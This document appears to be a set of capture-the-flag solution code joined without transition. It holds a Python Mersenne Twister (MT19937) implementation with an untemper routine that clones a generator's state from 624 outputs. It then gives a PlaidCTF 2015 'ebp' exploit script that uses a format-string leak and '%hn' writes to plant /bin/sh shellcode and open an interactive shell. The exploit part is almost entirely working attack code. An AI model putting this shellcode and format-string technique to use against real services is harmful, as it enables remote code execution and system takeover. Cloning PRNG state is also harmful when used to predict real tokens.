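            # Odd y: mix in the twist constant.
            if y % 2 != 0:
                self.MT[i] ^= 0x9908b0df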

def temper(y):
    """Apply MT19937's output tempering to the state word *y* and return it."""
    # (direction, shift, mask) for the four steps; mask None means unmasked.
    steps = (
        ("r", 11, None),
        ("l", 7, 0x9d2c5680),
        ("l", 15, 0xefc60000),
        ("r", 18, None),
    )
    for direction, amount, mask in steps:
        shifted = y >> amount if direction == "r" else y << amount
        if mask is not None:
            shifted &= mask
        y ^= shifted
    return y

def untemper(y):
    """Invert temper(): recover the state word from a tempered 32-bit output.

    Each stage undoes one tempering step, last step first.  The bits a step
    left untouched are recovered first and then used to rebuild the bits it
    changed.
    """
    # Undo y ^= y >> 18: the top 18 bits are intact, the low 14 follow.
    hi18 = y & 0xffffc000
    y3 = hi18 | ((y >> 18) ^ (y & 0x3fff))

    # Undo y ^= (y << 15) & 0xefc60000: bits outside the mask are intact.
    y2 = y3 & 0x1039ffff
    y2 |= (y3 ^ ((y2 << 15) & 0xefc60000)) & 0xfffe0000

    # Undo y ^= (y << 7) & 0x9d2c5680 seven bits at a time, low to high.
    y1 = y2 & 0x7f
    for chunk in (0x7f << 7, 0x7f << 14, 0x7f << 21, 0xf0000000):
        y1 |= (((y1 << 7) & 0x9d2c5680) ^ y2) & chunk

    # Undo y ^= y >> 11: top 11 bits intact, then two more slices downward.
    y0 = y1 & 0xffe00000
    for chunk in (0x001ffc00, 0x3ff):
        y0 |= ((y0 >> 11) ^ y1) & chunk

    return y0

def cloneMT(dolly):
    """Return a generator in the same state as *dolly*.

    Consumes 624 outputs from *dolly*; untempering each one yields the
    corresponding state word, so the clone's subsequent outputs match.
    """
    clone = MT19937(0)
    clone.MT[:] = [untemper(dolly.extract_number()) for _ in range(624)]
    return clone


if __name__ == "__main__":
    # Demo: clone a seeded generator from 624 of its outputs, then print the
    # two streams side by side for 100 further draws.
    dolly = MT19937(8675309)
    clone = cloneMT(dolly)
    for _ in range(100):
        pair = (dolly.extract_number(), clone.extract_number())
        print(*pair)
    print("Clone succeeded")

PlaidCTF-2015-Quals-ebp

Download: ebp_a96f7231ab81e1b0d7fe24d660def25a.elf

from zio import *

shellcode = ( # /bin/sh shellcode at http://shell-storm.org/shellcode/files/shellcode-236.php
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x54"
"\x5b\x52\x53\x54\x59\x0f\x34"
)

# Remote target with a very long timeout.
io = zio(('127.0.0.1',2333),timeout=2333)
#raw_input()
# One format-string probe; the 8 hex digits returned are parsed as an
# address, adjusted by 0x1c and reduced to the low 16 bits.
io.writeline("%4$x")
ebp = (int(io.read(8),16)-0x1c) & 0xffff
print "[+] Leaked Address: ", hex(ebp)

# Two more format-string lines; the second is prefixed with the shellcode,
# with the width padding reduced by its length.
io.writeline("%"+str(ebp)+"x%4$hn")
io.writeline(shellcode+"%"+str(0xa480-len(shellcode))+"x%"+str(12)+"$hn")
io.interact()